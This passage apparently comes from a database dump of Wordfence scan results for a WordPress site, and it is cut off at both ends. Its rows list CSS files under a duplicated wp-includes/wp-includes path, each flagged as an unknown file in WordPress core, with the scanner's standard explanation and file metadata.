file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77268,1675048816,1675048816,'new','knownfile',75,'7dd2744e5e2c1d5a0c03ca551c0843d9','40cd72ef27b15c3a6230e484a1530105','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/customize-preview-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77269,1675048816,1675048816,'new','knownfile',75,'f7d25d0debc889e3f087dd2dfb32f885','41a55dc6cbbb5c3805178e34aca24bf0','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/css/customize-preview.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77270,1675048817,1675048817,'new','knownfile',75,'6619318ea9d7432f9041fca658e0c7c1','0ef3f969331d088be30f69353d9ba643','Unknown file in WordPress core: wp-includes/wp-includes/css/customize-preview.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/customize-preview.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77271,1675048817,1675048817,'new','knownfile',75,'62862de32af2621c5ed6d57affbb41c6','818035408368ea6b567fd9ce9a8ec87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/css/dashicons.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77272,1675048817,1675048817,'new','knownfile',75,'a5c74d8b0bdc9cfe6bcff1e804f35246','a75fb48b5eb1c3bbf3bf04e37b845f25','Unknown file in WordPress core: wp-includes/wp-includes/css/dashicons.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/css/dashicons.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77273,1675048817,1675048817,'new','knownfile',75,'dbf615036b8c9e2020f9051375c87963','dae3f7444f2bc9e9640546f05df65132','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77274,1675048817,1675048817,'new','knownfile',75,'3c06f92cce51558f2e5da443103414d4','f0ca77de528f00009bc24aeb1202fd40','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77275,1675048817,1675048817,'new','knownfile',75,'430218750aa8f04753ef80cc063b0b82','53a51e19d65000663ebb532381697816','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/css/dist/block-directory/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77276,1675048817,1675048817,'new','knownfile',75,'f1842805a66772a97cc72a3eb0bf110b','beb5f032f6692801f98378c38c14bb82','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-directory/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/css/dist/block-directory/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77277,1675048817,1675048817,'new','knownfile',75,'a84918bb72be7a31b119348b031deda5','e93cd45981d31648d3799bd755fe6fb1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77278,1675048817,1675048817,'new','knownfile',75,'6c0e732d55b7d2ceeda615759d9c64e7','5843cdb3575abea326b66b67f39ef87a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77279,1675048817,1675048817,'new','knownfile',75,'ccfd0beea85c1088bcb39c389df2f7a6','94389adcd9aa383d2a92e8861d88db84','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/css/dist/block-editor/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77280,1675048817,1675048817,'new','knownfile',75,'d847dee81f035926112fa212154bf621','7dee631f940823fa10c71c2dcc3376da','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-editor/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/css/dist/block-editor/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77281,1675048817,1675048817,'new','knownfile',75,'ca4b6e8dafaeb712aa0a38f222275b41','f34717243782ada4a10b3a20c1bf2fb2','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77282,1675048817,1675048817,'new','knownfile',75,'d6a57fa7384420b1cee65b3c11613555','868baf690d325a0f8f1ad322a83fe73b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/common-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77283,1675048817,1675048817,'new','knownfile',75,'12f1a252a34c7f2147f7abf0b47b9583','760b3ffb39abaeab158ca34336a4778d','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/common.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77284,1675048817,1675048817,'new','knownfile',75,'43d83f21658dc22ff2a2a2cf16a702f3','03132b8b0188298d7112a9f3e9c08f5b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/common.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/common.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77285,1675048818,1675048818,'new','knownfile',75,'3dde8674acabcf989c6453fb8405e63b','8e59a6fdba73fb8f4136c4c8b64e350b','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77286,1675048818,1675048818,'new','knownfile',75,'e4e0753b1a96881ebb00bffd10b032d2','b31e9701b4d9ee3393ea6ad64ea27fbb','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/css/dist/block-library/editor-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77287,1675048818,1675048818,'new','knownfile',75,'659d269ba20d3de17a45729c4423fc2b','0d61aaf2dcd5a0110081c3f20e90202f','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/block-library/editor.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77288,1675048818,1675048818,'new','knownfile',75,'79889ff7fa3cbe21f91c68b39b5cb6b0','0a535559ef9fbf114b40200168cdfb8e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/editor.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/block-library/editor.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77289,1675048818,1675048818,'new','knownfile',75,'aca0e15a1fcd7309ff4d0c1b56e6a9c7','7ec45622731f3a708518ffc016364e79','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77290,1675048818,1675048818,'new','knownfile',75,'7095aaf94b04bbe1e197a0a0a9be1262','7dad73920cfaf111bb8858cab3e84d98','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77291,1675048818,1675048818,'new','knownfile',75,'982e45d54f801196f6a37b5dbfdfd22e','b0a01292780f2a9d1345f6dee66718a5','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77292,1675048818,1675048818,'new','knownfile',75,'618d344873f111c2fabaf3272b785391','4ec8a56527718ae1366f1a190066d688','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77293,1675048818,1675048818,'new','knownfile',75,'1e3aa1dca063663f7159b8c59381258c','bae4bca4d74854353c8e1f67438163b1','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77294,1675048818,1675048818,'new','knownfile',75,'b84c0778ec182f99bde295f7f14b65c2','1b346f3921487d2701b64bc04f6867fd','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/css/dist/block-library/theme-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77295,1675048818,1675048818,'new','knownfile',75,'5885fe7aea535ab089341f106e3f5b24','c24a9ebe1763abd4569d9b36c0870f23','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/block-library/theme.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77296,1675048818,1675048818,'new','knownfile',75,'b8837a9c1fe952cbcd264ccb6d0dae9b','f618dac3581d7b9770a25ef52088b493','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/block-library/theme.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/block-library/theme.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77297,1675048818,1675048818,'new','knownfile',75,'88eb3d8aae5ba58228667c8b0c1711b3','850b02a1e21b452880bfb22f90161b65','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77298,1675048818,1675048818,'new','knownfile',75,'099f7797343748173a6730ddebe8c5a3','6595a907e9e25b0eaf00c6c6c8db8840','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/css/dist/components/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77299,1675048818,1675048818,'new','knownfile',75,'864599f11818045bcffe987767893ddf','e79fe1de83cb063952a813d0a183a66e','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/css/dist/components/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77300,1675048819,1675048819,'new','knownfile',75,'b28e1618030d06a460640d5d41161988','23a452e4275b5ae22a01a050916f654a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/components/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/css/dist/components/style.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77301,1675048819,1675048819,'new','knownfile',75,'dfe01b85bebfdc77e47fc3a473117c99','e010118a560da8323bd1ecf324113af6','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77302,1675048819,1675048819,'new','knownfile',75,'49cf8f22fc88854a7e4223c8f1ddd03c','6756ff29be04601696f456bf46873b78','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/css/dist/edit-post/style-rtl.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77303,1675048819,1675048819,'new','knownfile',75,'bb79e97ad2c80919252b83b4aadbfe4c','9b7675a2af63d4e699bd2b3aab28f444','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/css/dist/edit-post/style.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77304,1675048819,1675048819,'new','knownfile',75,'14f9635cf7f7c4df255dfb8808cd05ab','9804a92e9b5b28b04fd8a85f81ccb94a','Unknown file in WordPress core: wp-includes/wp-includes/css/dist/edit-post/style.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous 